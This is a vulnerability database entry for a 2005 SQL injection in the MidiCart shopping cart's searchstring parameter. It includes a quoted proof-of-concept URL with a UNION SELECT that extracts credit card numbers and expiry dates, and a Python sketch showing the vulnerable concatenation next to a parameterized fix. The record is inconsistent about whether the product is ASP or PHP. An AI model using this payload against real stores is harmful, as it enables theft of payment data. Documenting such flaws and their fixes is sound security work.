MidiCart ASP searchstring Parameter Remote SQL Injection Vulnerability

Vulnerability ID: 1108754
Vulnerability type: SQL injection
Published: 2005-05-05
Updated: 2005-05-05
CVE ID: CVE-2005-1503
CNNVD-ID: CNNVD-200505-961
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/25614
https://www.securityfocus.com/bid/14545
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-961
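|Vulnerability details
MidiCart ASP is a commercial e-commerce solution supported by Coxco that runs on Microsoft Windows. MidiCart ASP has an input validation vulnerability in the way it handles user requests, which a remote attacker can exploit to gain unauthorized access to the database.
|Exploit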
source: http://www.securityfocus.com/bid/13512/info

MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

http://www.example.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
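
An added example, not taken from the advisory or from MidiCart's code: a Python/sqlite3 sketch of the concatenated search query that lets searchstring reach the SQL parser, next to a parameterized LIKE search that also escapes wildcards. The items schema, function names and sample rows are assumptions; only card_payment, CreditCard and ExpDate come from the request above.

```python
import sqlite3

def make_db():
    # Constructed sample data. The items schema is an assumption; the
    # card_payment table and its columns are named in the request above.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (name TEXT, price REAL);
        CREATE TABLE card_payment (CreditCard TEXT, ExpDate TEXT);
        INSERT INTO items VALUES ('piano', 900.0), ('guitar strap', 15.0),
                                 ('50% off cable', 4.0);
        INSERT INTO card_payment VALUES ('0000-CONSTRUCTED', '01/00');
    """)
    return conn

def build_concatenated_sql(searchstring):
    # "Before" pattern: request text is pasted into the statement, so a quote
    # in searchstring ends the LIKE literal and the rest is parsed as SQL.
    return ("SELECT name, price FROM items WHERE name LIKE '%"
            + searchstring + "%'")

def escape_like(term, esc="\\"):
    # Neutralise LIKE wildcards so the term only matches literally.
    # The escape character itself must be doubled first.
    for ch in (esc, "%", "_"):
        term = term.replace(ch, esc + ch)
    return term

def search_items(conn, searchstring):
    # "After" pattern: fixed statement text, value sent as a bound parameter.
    sql = "SELECT name, price FROM items WHERE name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(searchstring) + "%"
    return conn.execute(sql, (pattern,)).fetchall()
```

With the bound parameter, the whole searchstring value is compared as data, so a request shaped like the one above matches no item names and never touches card_payment.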
|Affected products
MidiCart Software MidiCart ASP
|References

Source: XF
Name: midicart-sql-injection(20428)
Link: http://xforce.iss.net/xforce/xfdb/20428
Source: BID
Name: 13515
Link: http://www.securityfocus.com/bid/13515
Source: BID
Name: 13514
Link: http://www.securityfocus.com/bid/13514
Source: BID
Name: 13513
Link: http://www.securityfocus.com/bid/13513
Source: BID
Name: 13512
Link: http://www.securityfocus.com/bid/13512
Source: OSVDB
Name: 16177
Link: http://www.osvdb.org/16177
Source: OSVDB
Name: 16176
Link: http://www.osvdb.org/16176
Source: OSVDB
Name: 16175
Link: http://www.osvdb.org/16175
Source: MISC
Link: http://www.hackgen.org/advisories/hackgen-2005-004.txt
Source: SECUNIA
Name: 15269
Link: http://secunia.com/advisories/15269
Source: BUGTRAQ
Name: 20050505 [hackgen-2005-#004] - Multiple bugs in MidiCart PHP Shopping Cart
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111533057918993&w=2
